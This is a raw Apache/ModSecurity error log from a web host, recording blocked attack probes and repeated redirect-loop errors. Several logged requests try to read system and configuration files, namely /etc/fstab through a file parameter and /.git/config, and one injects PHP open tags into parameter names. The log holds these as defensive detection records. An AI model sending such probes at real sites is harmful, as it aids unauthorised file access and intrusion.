[Mon May 11 16:03:56.971491 2026] [security2:error] [pid 1319953:tid 1319961] [client 216.73.216.110:35134] ModSecurity: Warning. Matched phrase "etc/fstab" at ARGS:filesrc. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: etc/fstab found within ARGS:filesrc: /etc/fstab"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agHhzOSQ-m-m0ukSShuPJQAAAUY"]
[Mon May 11 16:03:56.972102 2026] [security2:error] [pid 1319953:tid 1319961] [client 216.73.216.110:35134] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agHhzOSQ-m-m0ukSShuPJQAAAUY"]
[Mon May 11 16:03:57.031807 2026] [security2:error] [pid 1319953:tid 1319961] [client 216.73.216.110:35134] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agHhzOSQ-m-m0ukSShuPJQAAAUY"]
[Mon May 11 16:04:07.760334 2026] [security2:error] [pid 1319886:tid 1319929] [client 43.153.7.191:53706] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "letamsgarage.fr"] [uri "/"] [unique_id "agHh16y-5-wpj6Sx56anJgAAABM"]
[Mon May 11 16:04:11.731004 2026] [security2:error] [pid 1320674:tid 1321055] [client 43.153.7.191:51462] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "letamsgarage.fr"] [uri "/"] [unique_id "agHh26O9RdIr1DwxYR2gBAAAAMw"], referer: http://letamsgarage.fr
[Mon May 11 16:04:14.888008 2026] [security2:error] [pid 1319885:tid 1319918] [client 86.105.185.48:58967] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agHh3lchVQ3tCn0m9Opl4gAAARA"], referer: https://www.piregwan-genesis.com/
[Mon May 11 16:04:26.231931 2026] [security2:error] [pid 1319885:tid 1319927] [client 52.200.251.20:13377] ModSecurity: Warning. Pattern match "(?:<\\\\?(?!xml\\\\s)|<\\\\?php|\\\\[(?:/|\\\\\\\\)?php\\\\])" at ARGS_NAMES:php echo BASEFRONT ?>img/formation/flash/miniature/<?php echo $image ?>. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "41"] [id "933100"] [msg "PHP Injection Attack: PHP Open Tag Found"] [data "Matched Data: <? found within ARGS_NAMES:php echo BASEFRONT ?>img/formation/flash/miniature/<?php echo $image ?>: php echo basefront ?>img/formation/flash/miniature/<?php echo $image ?>"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "www.missmandarine.com"] [uri "/js/lightbox/<"] [unique_id "agHh6lchVQ3tCn0m9Opl9wAAARQ"]
[Mon May 11 16:04:26.232909 2026] [security2:error] [pid 1319885:tid 1319927] [client 52.200.251.20:13377] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/js/lightbox/<"] [unique_id "agHh6lchVQ3tCn0m9Opl9wAAARQ"]
[Mon May 11 16:04:26.328615 2026] [security2:error] [pid 1319885:tid 1319927] [client 52.200.251.20:13377] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): PHP Injection Attack: PHP Open Tag Found"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agHh6lchVQ3tCn0m9Opl9wAAARQ"]
[Mon May 11 16:04:53.867654 2026] [authz_core:error] [pid 1320398:tid 1320408] [client 176.120.22.46:62397] AH01630: client denied by server configuration: /home/krakouka/public_html/wp-includes/block-bindings/error_log, referer: https://krakoukas.com/wp-includes/block-bindings/
[Mon May 11 16:05:00.216044 2026] [authz_core:error] [pid 1319953:tid 1319956] [client 176.120.22.46:50839] AH01630: client denied by server configuration: /home/krakouka/public_html/wp-includes/block-patterns/error_log, referer: https://krakoukas.com/wp-includes/block-patterns/
[Mon May 11 16:05:06.541353 2026] [authz_core:error] [pid 1319885:tid 1319915] [client 176.120.22.46:55643] AH01630: client denied by server configuration: /home/krakouka/public_html/wp-includes/block-supports/error_log, referer: https://krakoukas.com/wp-includes/block-supports/
[Mon May 11 16:06:53.373334 2026] [security2:error] [pid 1320398:tid 1320417] [client 34.52.192.13:55982] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.classist.fr"] [uri "/.git/config"] [unique_id "agHifeJEyNRN152ArOSa3AAAAFE"]
[Mon May 11 16:06:53.373900 2026] [security2:error] [pid 1320398:tid 1320417] [client 34.52.192.13:55982] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.classist.fr"] [uri "/.git/config"] [unique_id "agHifeJEyNRN152ArOSa3AAAAFE"]
[Mon May 11 16:06:53.374268 2026] [security2:error] [pid 1320398:tid 1320417] [client 34.52.192.13:55982] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.classist.fr"] [uri "/.git/config"] [unique_id "agHifeJEyNRN152ArOSa3AAAAFE"]
[Mon May 11 16:06:58.451235 2026] [core:error] [pid 1320674:tid 1320698] [client 4.193.137.131:17413] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:06:58.451525 2026] [core:error] [pid 1320674:tid 1320698] [client 4.193.137.131:17413] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:06:58.935508 2026] [core:error] [pid 1319886:tid 1319919] [client 4.193.137.131:17442] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:06:58.935550 2026] [core:error] [pid 1319886:tid 1319919] [client 4.193.137.131:17442] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:06:59.456327 2026] [core:error] [pid 1319998:tid 1320011] [client 4.193.137.131:17450] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:06:59.456460 2026] [core:error] [pid 1319998:tid 1320011] [client 4.193.137.131:17450] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:06:59.977613 2026] [core:error] [pid 1319885:tid 1319890] [client 4.193.137.131:17826] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:06:59.977658 2026] [core:error] [pid 1319885:tid 1319890] [client 4.193.137.131:17826] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:07:00.468803 2026] [core:error] [pid 1319998:tid 1320019] [client 4.193.137.131:18389] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:07:00.468840 2026] [core:error] [pid 1319998:tid 1320019] [client 4.193.137.131:18389] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:07:00.960919 2026] [core:error] [pid 1319885:tid 1319900] [client 4.193.137.131:18411] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:07:00.961081 2026] [core:error] [pid 1319885:tid 1319900] [client 4.193.137.131:18411] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:07:01.480273 2026] [core:error] [pid 1319953:tid 1319962] [client 4.193.137.131:18407] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:07:01.480393 2026] [core:error] [pid 1319953:tid 1319962] [client 4.193.137.131:18407] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:07:01.976090 2026] [core:error] [pid 1319886:tid 1319933] [client 4.193.137.131:18384] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:07:01.976123 2026] [core:error] [pid 1319886:tid 1319933] [client 4.193.137.131:18384] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:07:02.456369 2026] [core:error] [pid 1319998:tid 1320005] [client 4.193.137.131:18383] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:07:02.456489 2026] [core:error] [pid 1319998:tid 1320005] [client 4.193.137.131:18383] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:07:02.942985 2026] [core:error] [pid 1319953:tid 1319969] [client 4.193.137.131:18388] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:07:02.943014 2026] [core:error] [pid 1319953:tid 1319969] [client 4.193.137.131:18388] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:07:03.434990 2026] [core:error] [pid 1319998:tid 1320023] [client 4.193.137.131:18423] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:07:03.435016 2026] [core:error] [pid 1319998:tid 1320023] [client 4.193.137.131:18423] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:07:03.939986 2026] [core:error] [pid 1319953:tid 1319978] [client 4.193.137.131:18427] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:07:03.940014 2026] [core:error] [pid 1319953:tid 1319978] [client 4.193.137.131:18427] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:07:04.434859 2026] [core:error] [pid 1319886:tid 1319931] [client 4.193.137.131:18428] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:07:04.434895 2026] [core:error] [pid 1319886:tid 1319931] [client 4.193.137.131:18428] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:07:04.916702 2026] [core:error] [pid 1319885:tid 1319889] [client 4.193.137.131:17456] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:07:04.916733 2026] [core:error] [pid 1319885:tid 1319889] [client 4.193.137.131:17456] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:07:05.401938 2026] [core:error] [pid 1319953:tid 1319964] [client 4.193.137.131:18372] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:07:05.401973 2026] [core:error] [pid 1319953:tid 1319964] [client 4.193.137.131:18372] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:07:05.909012 2026] [core:error] [pid 1320398:tid 1320411] [client 4.193.137.131:18426] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:07:05.909053 2026] [core:error] [pid 1320398:tid 1320411] [client 4.193.137.131:18426] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:07:06.403554 2026] [core:error] [pid 1320674:tid 1320711] [client 4.193.137.131:18380] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:07:06.403586 2026] [core:error] [pid 1320674:tid 1320711] [client 4.193.137.131:18380] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:07:06.919258 2026] [core:error] [pid 1319998:tid 1320008] [client 4.193.137.131:18409] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:07:06.919287 2026] [core:error] [pid 1319998:tid 1320008] [client 4.193.137.131:18409] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:07:07.414033 2026] [core:error] [pid 1319886:tid 1319908] [client 4.193.137.131:18402] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:07:07.414067 2026] [core:error] [pid 1319886:tid 1319908] [client 4.193.137.131:18402] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:07:07.901493 2026] [core:error] [pid 1319953:tid 1319956] [client 4.193.137.131:17408] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:07:07.901517 2026] [core:error] [pid 1319953:tid 1319956] [client 4.193.137.131:17408] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:07:08.381118 2026] [core:error] [pid 1319998:tid 1320012] [client 4.193.137.131:18396] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:07:08.381152 2026] [core:error] [pid 1319998:tid 1320012] [client 4.193.137.131:18396] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:07:08.874436 2026] [core:error] [pid 1320398:tid 1320403] [client 4.193.137.131:18418] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:07:08.874468 2026] [core:error] [pid 1320398:tid 1320403] [client 4.193.137.131:18418] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:07:09.350088 2026] [core:error] [pid 1319998:tid 1320002] [client 4.193.137.131:18379] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:07:09.350142 2026] [core:error] [pid 1319998:tid 1320002] [client 4.193.137.131:18379] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:07:09.846835 2026] [core:error] [pid 1320398:tid 1320401] [client 4.193.137.131:18385] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:07:09.846869 2026] [core:error] [pid 1320398:tid 1320401] [client 4.193.137.131:18385] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:07:10.373111 2026] [core:error] [pid 1320674:tid 1320690] [client 4.193.137.131:18394] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:07:10.373145 2026] [core:error] [pid 1320674:tid 1320690] [client 4.193.137.131:18394] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:07:10.853293 2026] [core:error] [pid 1319886:tid 1319902] [client 4.193.137.131:18421] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:07:10.853330 2026] [core:error] [pid 1319886:tid 1319902] [client 4.193.137.131:18421] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:07:11.335875 2026] [core:error] [pid 1319885:tid 1319918] [client 4.193.137.131:18419] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:07:11.335907 2026] [core:error] [pid 1319885:tid 1319918] [client 4.193.137.131:18419] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:07:11.839102 2026] [core:error] [pid 1320398:tid 1320402] [client 4.193.137.131:18377] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:07:11.839137 2026] [core:error] [pid 1320398:tid 1320402] [client 4.193.137.131:18377] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:07:12.320665 2026] [core:error] [pid 1319953:tid 1319968] [client 4.193.137.131:18388] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:07:12.320699 2026] [core:error] [pid 1319953:tid 1319968] [client 4.193.137.131:18388] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:07:12.802198 2026] [core:error] [pid 1319998:tid 1320010] [client 4.193.137.131:18391] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:07:12.802238 2026] [core:error] [pid 1319998:tid 1320010] [client 4.193.137.131:18391] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:07:13.279042 2026] [core:error] [pid 1319885:tid 1319935] [client 4.193.137.131:18404] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:07:13.279075 2026] [core:error] [pid 1319885:tid 1319935] [client 4.193.137.131:18404] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:07:13.756333 2026] [core:error] [pid 1319998:tid 1320001] [client 4.193.137.131:18368] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:07:13.756365 2026] [core:error] [pid 1319998:tid 1320001] [client 4.193.137.131:18368] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:07:14.232759 2026] [core:error] [pid 1319885:tid 1319892] [client 4.193.137.131:18387] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:07:14.232793 2026] [core:error] [pid 1319885:tid 1319892] [client 4.193.137.131:18387] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:07:14.729313 2026] [core:error] [pid 1320398:tid 1320406] [client 4.193.137.131:18426] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:07:14.729349 2026] [core:error] [pid 1320398:tid 1320406] [client 4.193.137.131:18426] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:07:15.245258 2026] [core:error] [pid 1320674:tid 1320713] [client 4.193.137.131:18374] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:07:15.245293 2026] [core:error] [pid 1320674:tid 1320713] [client 4.193.137.131:18374] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:07:15.723675 2026] [core:error] [pid 1320674:tid 1320699] [client 4.193.137.131:18400] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:07:15.723700 2026] [core:error] [pid 1320674:tid 1320699] [client 4.193.137.131:18400] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:07:16.224765 2026] [core:error] [pid 1319886:tid 1319916] [client 4.193.137.131:17413] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
